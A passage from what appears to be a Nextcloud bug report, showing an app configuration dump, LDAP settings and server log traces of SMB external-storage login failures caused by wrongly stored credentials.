"user_mounting_backends": "ftp,dav,owncloud,sftp,amazons3,swift,smb,\\OC\\Files\\Storage\\SFTP_Key,\\OC\\Files\\Storage\\SMB_OC"
},
"files_linkeditor": {
"enabled": "yes",
"installed_version": "1.1.3",
"types": ""
},
"files_pdfviewer": {
"enabled": "yes",
"installed_version": "2.0.1",
"types": ""
},
"files_rightclick": {
"enabled": "yes",
"installed_version": "0.17.0",
"types": ""
},
"files_sharing": {
"enabled": "yes",
"incoming_server2server_group_share_enabled": "yes",
"incoming_server2server_share_enabled": "yes",
"installed_version": "1.12.0",
"lookupServerEnabled": "no",
"lookupServerUploadEnabled": "no",
"outgoing_server2server_group_share_enabled": "yes",
"outgoing_server2server_share_enabled": "yes",
"types": "filesystem"
},
"files_trashbin": {
"enabled": "yes",
"installed_version": "1.10.1",
"types": "filesystem,dav"
},
"files_versions": {
"enabled": "yes",
"installed_version": "1.13.0",
"types": "filesystem,dav"
},
"files_videoplayer": {
"enabled": "yes",
"installed_version": "1.9.0",
"types": ""
},
"firstrunwizard": {
"enabled": "no",
"installed_version": "2.7.0",
"types": "logging"
},
"geoblocker": {
"chosenService": "0",
"enabled": "no",
"installed_version": "0.2.0",
"types": ""
},
"groupfolders": {
"enabled": "no",
"installed_version": "6.0.5",
"types": "filesystem,dav"
},
"impersonate": {
"enabled": "no",
"installed_version": "1.5.0",
"types": ""
},
"logreader": {
"enabled": "yes",
"installed_version": "2.5.0",
"levels": "00011",
"live": "",
"types": ""
},
"lookup_server_connector": {
"enabled": "yes",
"installed_version": "1.8.0",
"types": "authentication"
},
"metadata": {
"enabled": "yes",
"installed_version": "0.12.0",
"types": ""
},
"nextcloud_announcements": {
"enabled": "no",
"installed_version": "1.7.0",
"pub_date": "Thu, 24 Oct 2019 00:00:00 +0200",
"types": "logging"
},
"notes": {
"enabled": "no",
"installed_version": "3.2.0",
"types": ""
},
"notifications": {
"enabled": "yes",
"installed_version": "2.8.0",
"types": "logging"
},
"oauth2": {
"enabled": "yes",
"installed_version": "1.8.0",
"types": "authentication"
},
"onlyoffice": {
"enabled": "no",
"installed_version": "4.1.4",
"types": "filesystem"
},
"password_policy": {
"enabled": "no",
"installed_version": "1.8.0",
"types": ""
},
"photos": {
"enabled": "yes",
"installed_version": "1.2.0",
"types": ""
},
"polls": {
"enabled": "no",
"installed_version": "1.3.0",
"types": ""
},
"privacy": {
"enabled": "no",
"installed_version": "1.2.0",
"readableLocation": "at",
"types": ""
},
"provisioning_api": {
"enabled": "yes",
"installed_version": "1.10.0",
"types": "prevent_group_restriction"
},
"ransomware_protection": {
"enabled": "yes",
"installed_version": "1.8.0",
"types": "logging"
},
"recommendations": {
"enabled": "no",
"installed_version": "0.6.0",
"types": ""
},
"serverinfo": {
"enabled": "no",
"installed_version": "1.8.0",
"types": ""
},
"settings": {
"enabled": "yes",
"installed_version": "1.2.0",
"types": ""
},
"sharebymail": {
"enabled": "yes",
"enforcePasswordProtection": "no",
"installed_version": "1.10.0",
"types": "filesystem"
},
"socialsharing_email": {
"enabled": "yes",
"installed_version": "2.1.0",
"types": ""
},
"spreed": {
"conversations_files_public_shares": "0",
"enabled": "no",
"has_reference_id": "yes",
"installed_version": "10.0.3",
"project_access_invalidated": "1",
"stun_servers": "***REMOVED SENSITIVE VALUE***",
"types": "prevent_group_restriction"
},
"support": {
"enabled": "no",
"installed_version": "1.1.0",
"types": "session"
},
"survey_client": {
"enabled": "no",
"installed_version": "1.6.0",
"types": ""
},
"systemtags": {
"enabled": "no",
"installed_version": "1.8.0",
"types": "logging"
},
"tasks": {
"enabled": "no",
"installed_version": "0.12.1",
"types": ""
},
"text": {
"enabled": "yes",
"installed_version": "3.1.0",
"types": "dav"
},
"theming": {
"backgroundMime": "image\/jpeg",
"cachebuster": "18",
"color": "#1062ae",
"enabled": "yes",
"faviconMime": "image\/png",
"imprintUrl": "***REMOVED SENSITIVE VALUE***",
"installed_version": "1.11.0",
"logoMime": "image\/png",
"logoheaderMime": "image\/png",
"name": "My Cloud",
"privacyUrl": "***REMOVED SENSITIVE VALUE***",
"slogan": "***REMOVED SENSITIVE VALUE***",
"types": "logging",
"url": "***REMOVED SENSITIVE VALUE***"
},
"theming_customcss": {
"enabled": "yes",
"installed_version": "1.7.0",
"types": ""
},
"twofactor_backupcodes": {
"enabled": "yes",
"installed_version": "1.9.0",
"types": ""
},
"twofactor_nextcloud_notification": {
"alex.hofstaetter_3993_enabled": "0",
"alex.hofstaetter_enabled": "0",
"enabled": "yes",
"installed_version": "3.0.0",
"types": ""
},
"twofactor_totp": {
"enabled": "yes",
"installed_version": "5.0.0",
"types": ""
},
"twofactor_u2f": {
"enabled": "yes",
"installed_version": "6.0.0",
"types": ""
},
"updatenotification": {
"core": "18.0.11.2",
"drawio": "0.9.8",
"enabled": "yes",
"extract": "1.2.5",
"files_linkeditor": "1.1.3",
"installed_version": "1.10.0",
"metadata": "0.12.0",
"notify_groups": "[]",
"socialsharing_email": "2.1.0",
"spreed": "8.0.13",
"theming_customcss": "1.6.0",
"twofactor_totp": "5.0.0",
"twofactor_u2f": "6.0.0",
"types": "",
"update_check_errors": "0"
},
"user_ldap": {
"background_sync_interval": "1800",
"background_sync_offset": "0",
"background_sync_prefix": "s01",
"cleanUpJobOffset": "0",
"enabled": "yes",
"installed_version": "1.10.2",
"s01_lastChange": "1607316770",
"s01has_memberof_filter_support": "1",
"s01home_folder_naming_rule": "",
"s01last_jpegPhoto_lookup": "0",
"s01ldap_agent_password": "***REMOVED SENSITIVE VALUE***",
"s01ldap_attributes_for_group_search": "",
"s01ldap_attributes_for_user_search": "",
"s01ldap_backup_host": "dc2.intern.example.org",
"s01ldap_backup_port": "636",
"s01ldap_base": "OU=Example,DC=intern,DC=example,DC=org",
"s01ldap_base_groups": "OU=Gruppen,OU=Example,dc=intern,DC=example,DC=org\nOU=Netzlaufwerke,OU=Service-Berechtigungen,OU=Example,dc=intern,DC=example,DC=org",
"s01ldap_base_users": "OU=Benutzer,OU=Example,dc=intern,DC=example,DC=org",
"s01ldap_cache_ttl": "0",
"s01ldap_configuration_active": "1",
"s01ldap_default_ppolicy_dn": "",
"s01ldap_display_name": "displayname",
"s01ldap_dn": "SA-LDAP-Nextcloud",
"s01ldap_dynamic_group_member_url": "",
"s01ldap_email_attr": "mail",
"s01ldap_experienced_admin": "0",
"s01ldap_expert_username_attr": "sAMAccountName",
"s01ldap_expert_uuid_group_attr": "distinguishedName",
"s01ldap_expert_uuid_user_attr": "sAMAccountName",
"s01ldap_ext_storage_home_attribute": "",
"s01ldap_gid_number": "gidNumber",
"s01ldap_group_display_name": "cn",
"s01ldap_group_filter": "(&(|(objectclass=group)))",
"s01ldap_group_filter_mode": "1",
"s01ldap_group_member_assoc_attribute": "member",
"s01ldap_groupfilter_groups": "",
"s01ldap_groupfilter_objectclass": "group",
"s01ldap_host": "ldaps:\/\/dc1.intern.example.org",
"s01ldap_login_filter": "(&(&(|(objectCategory=person)(objectclass=user)))(|(samaccountname=%uid)(userPrincipalName=%uid)))",
"s01ldap_login_filter_mode": "1",
"s01ldap_loginfilter_attributes": "sAMAccountName",
"s01ldap_loginfilter_email": "1",
"s01ldap_loginfilter_username": "1",
"s01ldap_matching_rule_in_chain_state": "available",
"s01ldap_nested_groups": "1",
"s01ldap_override_main_server": "0",
"s01ldap_paging_size": "0",
"s01ldap_port": "636",
"s01ldap_quota_attr": "",
"s01ldap_quota_def": "",
"s01ldap_tls": "0",
"s01ldap_turn_off_cert_check": "1",
"s01ldap_turn_on_pwd_change": "0",
"s01ldap_user_avatar_rule": "default",
"s01ldap_user_display_name_2": "",
"s01ldap_user_filter_mode": "1",
"s01ldap_userfilter_groups": "",
"s01ldap_userfilter_objectclass": "person\nuser",
"s01ldap_userlist_filter": "(&(|(objectclass=person)(objectclass=user)))",
"s01use_memberof_to_detect_membership": "1",
"types": "authentication"
},
"user_status": {
"enabled": "no",
"installed_version": "1.0.1",
"types": ""
},
"viewer": {
"enabled": "yes",
"installed_version": "1.4.0",
"types": ""
},
"weather_status": {
"enabled": "no",
"installed_version": "1.0.0",
"types": ""
},
"workflowengine": {
"enabled": "yes",
"installed_version": "2.2.0",
"types": "filesystem"
}
}
}
```
</details>
**Are you using external storage, if yes which one:** SMB
**Are you using encryption:** no encryption at rest
**Are you using an external user-backend, if yes which one:** LDAP
#### LDAP configuration (delete this part if not used)
<details>
<summary>LDAP config</summary>
```
+-------------------------------+-----------------------------------------------------------------------------------------------------------------------------------+
| Configuration | s01 |
+-------------------------------+-----------------------------------------------------------------------------------------------------------------------------------+
| hasMemberOfFilterSupport | 1 |
| homeFolderNamingRule | |
| lastJpegPhotoLookup | 0 |
| ldapAgentName | SA-LDAP-Nextcloud |
| ldapAgentPassword | *** |
| ldapAttributesForGroupSearch | |
| ldapAttributesForUserSearch | |
| ldapBackupHost | dc2.intern.example.org |
| ldapBackupPort | 636 |
| ldapBase | OU=example,DC=intern,DC=example,DC=org |
| ldapBaseGroups | OU=Gruppen,OU=example,dc=intern,dc=example,DC=org;OU=Netzlaufwerke,OU=Service-Berechtigungen,OU=example,dc=intern,dc=example,DC=org |
| ldapBaseUsers | OU=Benutzer,OU=example,dc=intern,dc=example,DC=org |
| ldapCacheTTL | 0 |
| ldapConfigurationActive | 1 |
| ldapDefaultPPolicyDN | |
| ldapDynamicGroupMemberURL | |
| ldapEmailAttribute | mail |
| ldapExperiencedAdmin | 0 |
| ldapExpertUUIDGroupAttr | distinguishedName |
| ldapExpertUUIDUserAttr | sAMAccountName |
| ldapExpertUsernameAttr | sAMAccountName |
| ldapExtStorageHomeAttribute | |
| ldapGidNumber | gidNumber |
| ldapGroupDisplayName | cn |
| ldapGroupFilter | (&(|(objectclass=group))) |
| ldapGroupFilterGroups | |
| ldapGroupFilterMode | 1 |
| ldapGroupFilterObjectclass | group |
| ldapGroupMemberAssocAttr | member |
| ldapHost | ldaps://dc1.intern.example.org |
| ldapIgnoreNamingRules | |
| ldapLoginFilter | (&(&(|(objectCategory=person)(objectclass=user)))(|(samaccountname=%uid)(userPrincipalName=%uid))) |
| ldapLoginFilterAttributes | sAMAccountName |
| ldapLoginFilterEmail | 1 |
| ldapLoginFilterMode | 1 |
| ldapLoginFilterUsername | 1 |
| ldapMatchingRuleInChainState | available |
| ldapNestedGroups | 1 |
| ldapOverrideMainServer | 0 |
| ldapPagingSize | 0 |
| ldapPort | 636 |
| ldapQuotaAttribute | |
| ldapQuotaDefault | |
| ldapTLS | 0 |
| ldapUserAvatarRule | default |
| ldapUserDisplayName | displayname |
| ldapUserDisplayName2 | |
| ldapUserFilter | (&(|(objectclass=person)(objectclass=user))) |
| ldapUserFilterGroups | |
| ldapUserFilterMode | 1 |
| ldapUserFilterObjectclass | person;user |
| ldapUuidGroupAttribute | auto |
| ldapUuidUserAttribute | auto |
| turnOffCertCheck | 1 |
| turnOnPasswordChange | 0 |
| useMemberOfToDetectMembership | 1 |
+-------------------------------+-----------------------------------------------------------------------------------------------------------------------------------+
```
</details>
### Client configuration
**Browser:** Chromoum 87
**Operating system:** macOS 10.15.7
### Logs
In the nextcloud log section you can find the log of the initial user login who gets "denied" on the SMB storage due to wrong stored credentials.
#### Nextcloud log (data/nextcloud.log)
<details>
<summary>Nextcloud log</summary>
{"reqId":"Dlfg3EFwBgyAHSa1S5Ic","level":3,"time":"2020-12-07T21:25:50+00:00","remoteAddr":"192.168.144.3","user":"thomas.stagl","app":"no app in context","method":"GET","url":"/index.php/apps/files_external/userglobalstorages/2?testOnly=false","message":{"Exception":"Icewind\\SMB\\Exception\\ForbiddenException","Message":"Invalid request for / (ForbiddenException)","Code":1,"Trace":[{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeState.php","line":66,"function":"fromMap","class":"Icewind\\SMB\\Exception\\Exception","type":"::","args":[{"1":"Icewind\\SMB\\Exception\\ForbiddenException","2":"Icewind\\SMB\\Exception\\NotFoundException","13":"Icewind\\SMB\\Exception\\ForbiddenException","16":"Icewind\\SMB\\Exception\\FileInUseException","17":"Icewind\\SMB\\Exception\\AlreadyExistsException","20":"Icewind\\SMB\\Exception\\InvalidTypeException","21":"Icewind\\SMB\\Exception\\InvalidTypeException","22":"Icewind\\SMB\\Exception\\InvalidArgumentException","28":"Icewind\\SMB\\Exception\\OutOfSpaceException","39":"Icewind\\SMB\\Exception\\NotEmptyException","103":"Icewind\\SMB\\Exception\\ConnectionAbortedException","104":"Icewind\\SMB\\Exception\\ConnectionResetException","110":"Icewind\\SMB\\Exception\\TimedOutException","111":"Icewind\\SMB\\Exception\\ConnectionRefusedException","112":"Icewind\\SMB\\Exception\\HostDownException","113":"Icewind\\SMB\\Exception\\NoRouteToHostException"},1,"/"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeState.php","line":78,"function":"handleError","class":"Icewind\\SMB\\Native\\NativeState","type":"->","args":["/"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeState.php","line":294,"function":"testResult","class":"Icewind\\SMB\\Native\\NativeState","type":"->","args":["*** sensitive parameter replaced ***","smb://server1.intern.laab.gv.at/Gemeinde/"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeShare.php","line":306,"function":"getxattr","class":"Icewind\\SMB\\Native\\NativeState","type":"->","args":["smb://server1.intern.laab.gv.at/Gemeinde/","system.dos_attr.*"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeFileInfo.php","line":64,"function":"getAttribute","class":"Icewind\\SMB\\Native\\NativeShare","type":"->","args":["/","system.dos_attr.*"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeFileInfo.php","line":83,"function":"stat","class":"Icewind\\SMB\\Native\\NativeFileInfo","type":"->","args":[]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeShare.php","line":113,"function":"getSize","class":"Icewind\\SMB\\Native\\NativeFileInfo","type":"->","args":[]},{"file":"/var/www/html/apps/files_external/lib/Lib/Storage/SMB.php","line":188,"function":"stat","class":"Icewind\\SMB\\Native\\NativeShare","type":"->","args":["/"]},{"file":"/var/www/html/apps/files_external/lib/Lib/Storage/SMB.php","line":336,"function":"getFileInfo","class":"OCA\\Files_External\\Lib\\Storage\\SMB","type":"->","args":["/"]},{"file":"/var/www/html/lib/private/Files/Storage/Common.php","line":458,"function":"stat","class":"OCA\\Files_External\\Lib\\Storage\\SMB","type":"->","args":[""]},{"file":"/var/www/html/apps/files_external/lib/Lib/Storage/SMB.php","line":703,"function":"test","class":"OC\\Files\\Storage\\Common","type":"->","args":[]},{"file":"/var/www/html/apps/files_external/lib/MountConfig.php","line":264,"function":"test","class":"OCA\\Files_External\\Lib\\Storage\\SMB","type":"->","args":["*** sensitive parameter replaced ***","*** sensitive parameter replaced ***"]},{"file":"/var/www/html/apps/files_external/lib/Controller/StoragesController.php","line":258,"function":"getBackendStatus","class":"OCA\\Files_External\\MountConfig","type":"::","args":["*** sensitive parameters replaced ***"]},{"file":"/var/www/html/apps/files_external/lib/Controller/UserGlobalStoragesController.php","line":124,"function":"updateStorageStatus","class":"OCA\\Files_External\\Controller\\StoragesController","type":"->","args":["*** sensitive parameters replaced ***"]},{"file":"/var/www/html/lib/private/AppFramework/Http/Dispatcher.php","line":169,"function":"show","class":"OCA\\Files_External\\Controller\\UserGlobalStoragesController","type":"->","args":[2,"*** sensitive parameter replaced ***"]},{"file":"/var/www/html/lib/private/AppFramework/Http/Dispatcher.php","line":100,"function":"executeController","class":"OC\\AppFramework\\Http\\Dispatcher","type":"->","args":[{"__class__":"OCA\\Files_External\\Controller\\UserGlobalStoragesController"},"show"]},{"file":"/var/www/html/lib/private/AppFramework/App.php","line":152,"function":"dispatch","class":"OC\\AppFramework\\Http\\Dispatcher","type":"->","args":[{"__class__":"OCA\\Files_External\\Controller\\UserGlobalStoragesController"},"show"]},{"file":"/var/www/html/lib/private/Route/Router.php","line":308,"function":"main","class":"OC\\AppFramework\\App","type":"::","args":["OCA\\Files_External\\Controller\\UserGlobalStoragesController","show",{"__class__":"OC\\AppFramework\\DependencyInjection\\DIContainer"},{"action":null,"id":"2","_route":"files_external.user_global_storages.show"}]},{"file":"/var/www/html/lib/base.php","line":1008,"function":"match","class":"OC\\Route\\Router","type":"->","args":["/apps/files_external/userglobalstorages/2"]},{"file":"/var/www/html/index.php","line":37,"function":"handleRequest","class":"OC","type":"::","args":[]}],"File":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Exception/Exception.php","Line":30,"CustomMessage":"Error while getting file info"},"userAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36","version":"20.0.2.2"}
{"reqId":"TGfAbJwlIgPJILJHMH09","level":3,"time":"2020-12-07T21:25:50+00:00","remoteAddr":"192.168.144.3","user":"thomas.stagl","app":"no app in context","method":"GET","url":"/index.php/apps/files_external/userglobalstorages/5?testOnly=false","message":{"Exception":"Icewind\\SMB\\Exception\\ForbiddenException","Message":"Invalid request for / (ForbiddenException)","Code":1,"Trace":[{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeState.php","line":66,"function":"fromMap","class":"Icewind\\SMB\\Exception\\Exception","type":"::","args":[{"1":"Icewind\\SMB\\Exception\\ForbiddenException","2":"Icewind\\SMB\\Exception\\NotFoundException","13":"Icewind\\SMB\\Exception\\ForbiddenException","16":"Icewind\\SMB\\Exception\\FileInUseException","17":"Icewind\\SMB\\Exception\\AlreadyExistsException","20":"Icewind\\SMB\\Exception\\InvalidTypeException","21":"Icewind\\SMB\\Exception\\InvalidTypeException","22":"Icewind\\SMB\\Exception\\InvalidArgumentException","28":"Icewind\\SMB\\Exception\\OutOfSpaceException","39":"Icewind\\SMB\\Exception\\NotEmptyException","103":"Icewind\\SMB\\Exception\\ConnectionAbortedException","104":"Icewind\\SMB\\Exception\\ConnectionResetException","110":"Icewind\\SMB\\Exception\\TimedOutException","111":"Icewind\\SMB\\Exception\\ConnectionRefusedException","112":"Icewind\\SMB\\Exception\\HostDownException","113":"Icewind\\SMB\\Exception\\NoRouteToHostException"},1,"/"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeState.php","line":78,"function":"handleError","class":"Icewind\\SMB\\Native\\NativeState","type":"->","args":["/"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeState.php","line":294,"function":"testResult","class":"Icewind\\SMB\\Native\\NativeState","type":"->","args":["*** sensitive parameter replaced ***","smb://server1.intern.laab.gv.at/MFL/"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeShare.php","line":306,"function":"getxattr","class":"Icewind\\SMB\\Native\\NativeState","type":"->","args":["smb://server1.intern.laab.gv.at/MFL/","system.dos_attr.*"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeFileInfo.php","line":64,"function":"getAttribute","class":"Icewind\\SMB\\Native\\NativeShare","type":"->","args":["/","system.dos_attr.*"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeFileInfo.php","line":83,"function":"stat","class":"Icewind\\SMB\\Native\\NativeFileInfo","type":"->","args":[]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeShare.php","line":113,"function":"getSize","class":"Icewind\\SMB\\Native\\NativeFileInfo","type":"->","args":[]},{"file":"/var/www/html/apps/files_external/lib/Lib/Storage/SMB.php","line":188,"function":"stat","class":"Icewind\\SMB\\Native\\NativeShare","type":"->","args":["/"]},{"file":"/var/www/html/apps/files_external/lib/Lib/Storage/SMB.php","line":336,"function":"getFileInfo","class":"OCA\\Files_External\\Lib\\Storage\\SMB","type":"->","args":["/"]},{"file":"/var/www/html/lib/private/Files/Storage/Common.php","line":458,"function":"stat","class":"OCA\\Files_External\\Lib\\Storage\\SMB","type":"->","args":[""]},{"file":"/var/www/html/apps/files_external/lib/Lib/Storage/SMB.php","line":703,"function":"test","class":"OC\\Files\\Storage\\Common","type":"->","args":[]},{"file":"/var/www/html/apps/files_external/lib/MountConfig.php","line":264,"function":"test","class":"OCA\\Files_External\\Lib\\Storage\\SMB","type":"->","args":["*** sensitive parameter replaced ***","*** sensitive parameter replaced ***"]},{"file":"/var/www/html/apps/files_external/lib/Controller/StoragesController.php","line":258,"function":"getBackendStatus","class":"OCA\\Files_External\\MountConfig","type":"::","args":["*** sensitive parameters replaced ***"]},{"file":"/var/www/html/apps/files_external/lib/Controller/UserGlobalStoragesController.php","line":124,"function":"updateStorageStatus","class":"OCA\\Files_External\\Controller\\StoragesController","type":"->","args":["*** sensitive parameters replaced ***"]},{"file":"/var/www/html/lib/private/AppFramework/Http/Dispatcher.php","line":169,"function":"show","class":"OCA\\Files_External\\Controller\\UserGlobalStoragesController","type":"->","args":[5,"*** sensitive parameter replaced ***"]},{"file":"/var/www/html/lib/private/AppFramework/Http/Dispatcher.php","line":100,"function":"executeController","class":"OC\\AppFramework\\Http\\Dispatcher","type":"->","args":[{"__class__":"OCA\\Files_External\\Controller\\UserGlobalStoragesController"},"show"]},{"file":"/var/www/html/lib/private/AppFramework/App.php","line":152,"function":"dispatch","class":"OC\\AppFramework\\Http\\Dispatcher","type":"->","args":[{"__class__":"OCA\\Files_External\\Controller\\UserGlobalStoragesController"},"show"]},{"file":"/var/www/html/lib/private/Route/Router.php","line":308,"function":"main","class":"OC\\AppFramework\\App","type":"::","args":["OCA\\Files_External\\Controller\\UserGlobalStoragesController","show",{"__class__":"OC\\AppFramework\\DependencyInjection\\DIContainer"},{"action":null,"id":"5","_route":"files_external.user_global_storages.show"}]},{"file":"/var/www/html/lib/base.php","line":1008,"function":"match","class":"OC\\Route\\Router","type":"->","args":["/apps/files_external/userglobalstorages/5"]},{"file":"/var/www/html/index.php","line":37,"function":"handleRequest","class":"OC","type":"::","args":[]}],"File":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Exception/Exception.php","Line":30,"CustomMessage":"Error while getting file info"},"userAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36","version":"20.0.2.2"}
{"reqId":"K0Qai5Oxs2Nq9GN1YYrB","level":3,"time":"2020-12-07T21:25:50+00:00","remoteAddr":"192.168.144.3","user":"thomas.stagl","app":"no app in context","method":"GET","url":"/index.php/apps/files_external/userglobalstorages/3?testOnly=false","message":{"Exception":"Icewind\\SMB\\Exception\\ForbiddenException","Message":"Invalid request for / (ForbiddenException)","Code":1,"Trace":[{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeState.php","line":66,"function":"fromMap","class":"Icewind\\SMB\\Exception\\Exception","type":"::","args":[{"1":"Icewind\\SMB\\Exception\\ForbiddenException","2":"Icewind\\SMB\\Exception\\NotFoundException","13":"Icewind\\SMB\\Exception\\ForbiddenException","16":"Icewind\\SMB\\Exception\\FileInUseException","17":"Icewind\\SMB\\Exception\\AlreadyExistsException","20":"Icewind\\SMB\\Exception\\InvalidTypeException","21":"Icewind\\SMB\\Exception\\InvalidTypeException","22":"Icewind\\SMB\\Exception\\InvalidArgumentException","28":"Icewind\\SMB\\Exception\\OutOfSpaceException","39":"Icewind\\SMB\\Exception\\NotEmptyException","103":"Icewind\\SMB\\Exception\\ConnectionAbortedException","104":"Icewind\\SMB\\Exception\\ConnectionResetException","110":"Icewind\\SMB\\Exception\\TimedOutException","111":"Icewind\\SMB\\Exception\\ConnectionRefusedException","112":"Icewind\\SMB\\Exception\\HostDownException","113":"Icewind\\SMB\\Exception\\NoRouteToHostException"},1,"/"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeState.php","line":78,"function":"handleError","class":"Icewind\\SMB\\Native\\NativeState","type":"->","args":["/"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeState.php","line":294,"function":"testResult","class":"Icewind\\SMB\\Native\\NativeState","type":"->","args":["*** sensitive parameter replaced ***","smb://server1.intern.laab.gv.at/Feuerwehr/"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeShare.php","line":306,"function":"getxattr","class":"Icewind\\SMB\\Native\\NativeState","type":"->","args":["smb://server1.intern.laab.gv.at/Feuerwehr/","system.dos_attr.*"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeFileInfo.php","line":64,"function":"getAttribute","class":"Icewind\\SMB\\Native\\NativeShare","type":"->","args":["/","system.dos_attr.*"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeFileInfo.php","line":83,"function":"stat","class":"Icewind\\SMB\\Native\\NativeFileInfo","type":"->","args":[]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeShare.php","line":113,"function":"getSize","class":"Icewind\\SMB\\Native\\NativeFileInfo","type":"->","args":[]},{"file":"/var/www/html/apps/files_external/lib/Lib/Storage/SMB.php","line":188,"function":"stat","class":"Icewind\\SMB\\Native\\NativeShare","type":"->","args":["/"]},{"file":"/var/www/html/apps/files_external/lib/Lib/Storage/SMB.php","line":336,"function":"getFileInfo","class":"OCA\\Files_External\\Lib\\Storage\\SMB","type":"->","args":["/"]},{"file":"/var/www/html/lib/private/Files/Storage/Common.php","line":458,"function":"stat","class":"OCA\\Files_External\\Lib\\Storage\\SMB","type":"->","args":[""]},{"file":"/var/www/html/apps/files_external/lib/Lib/Storage/SMB.php","line":703,"function":"test","class":"OC\\Files\\Storage\\Common","type":"->","args":[]},{"file":"/var/www/html/apps/files_external/lib/MountConfig.php","line":264,"function":"test","class":"OCA\\Files_External\\Lib\\Storage\\SMB","type":"->","args":["*** sensitive parameter replaced ***","*** sensitive parameter replaced ***"]},{"file":"/var/www/html/apps/files_external/lib/Controller/StoragesController.php","line":258,"function":"getBackendStatus","class":"OCA\\Files_External\\MountConfig","type":"::","args":["*** sensitive parameters replaced ***"]},{"file":"/var/www/html/apps/files_external/lib/Controller/UserGlobalStoragesController.php","line":124,"function":"updateStorageStatus","class":"OCA\\Files_External\\Controller\\StoragesController","type":"->","args":["*** sensitive parameters replaced ***"]},{"file":"/var/www/html/lib/private/AppFramework/Http/Dispatcher.php","line":169,"function":"show","class":"OCA\\Files_External\\Controller\\UserGlobalStoragesController","type":"->","args":[3,"*** sensitive parameter replaced ***"]},{"file":"/var/www/html/lib/private/AppFramework/Http/Dispatcher.php","line":100,"function":"executeController","class":"OC\\AppFramework\\Http\\Dispatcher","type":"->","args":[{"__class__":"OCA\\Files_External\\Controller\\UserGlobalStoragesController"},"show"]},{"file":"/var/www/html/lib/private/AppFramework/App.php","line":152,"function":"dispatch","class":"OC\\AppFramework\\Http\\Dispatcher","type":"->","args":[{"__class__":"OCA\\Files_External\\Controller\\UserGlobalStoragesController"},"show"]},{"file":"/var/www/html/lib/private/Route/Router.php","line":308,"function":"main","class":"OC\\AppFramework\\App","type":"::","args":["OCA\\Files_External\\Controller\\UserGlobalStoragesController","show",{"__class__":"OC\\AppFramework\\DependencyInjection\\DIContainer"},{"action":null,"id":"3","_route":"files_external.user_global_storages.show"}]},{"file":"/var/www/html/lib/base.php","line":1008,"function":"match","class":"OC\\Route\\Router","type":"->","args":["/apps/files_external/userglobalstorages/3"]},{"file":"/var/www/html/index.php","line":37,"function":"handleRequest","class":"OC","type":"::","args":[]}],"File":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Exception/Exception.php","Line":30,"CustomMessage":"Error while getting file info"},"userAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36","version":"20.0.2.2"}
{"reqId":"rJZ0VGuGoLnqEhgskcGM","level":3,"time":"2020-12-07T21:25:50+00:00","remoteAddr":"192.168.144.3","user":"thomas.stagl","app":"no app in context","method":"GET","url":"/index.php/apps/files_external/userglobalstorages/1?testOnly=false","message":{"Exception":"Icewind\\SMB\\Exception\\ForbiddenException","Message":"Invalid request for /thomas.stagl (ForbiddenException)","Code":1,"Trace":[{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeState.php","line":66,"function":"fromMap","class":"Icewind\\SMB\\Exception\\Exception","type":"::","args":[{"1":"Icewind\\SMB\\Exception\\ForbiddenException","2":"Icewind\\SMB\\Exception\\NotFoundException","13":"Icewind\\SMB\\Exception\\ForbiddenException","16":"Icewind\\SMB\\Exception\\FileInUseException","17":"Icewind\\SMB\\Exception\\AlreadyExistsException","20":"Icewind\\SMB\\Exception\\InvalidTypeException","21":"Icewind\\SMB\\Exception\\InvalidTypeException","22":"Icewind\\SMB\\Exception\\InvalidArgumentException","28":"Icewind\\SMB\\Exception\\OutOfSpaceException","39":"Icewind\\SMB\\Exception\\NotEmptyException","103":"Icewind\\SMB\\Exception\\ConnectionAbortedException","104":"Icewind\\SMB\\Exception\\ConnectionResetException","110":"Icewind\\SMB\\Exception\\TimedOutException","111":"Icewind\\SMB\\Exception\\ConnectionRefusedException","112":"Icewind\\SMB\\Exception\\HostDownException","113":"Icewind\\SMB\\Exception\\NoRouteToHostException"},1,"/thomas.stagl"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeState.php","line":78,"function":"handleError","class":"Icewind\\SMB\\Native\\NativeState","type":"->","args":["/thomas.stagl"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeState.php","line":294,"function":"testResult","class":"Icewind\\SMB\\Native\\NativeState","type":"->","args":["*** 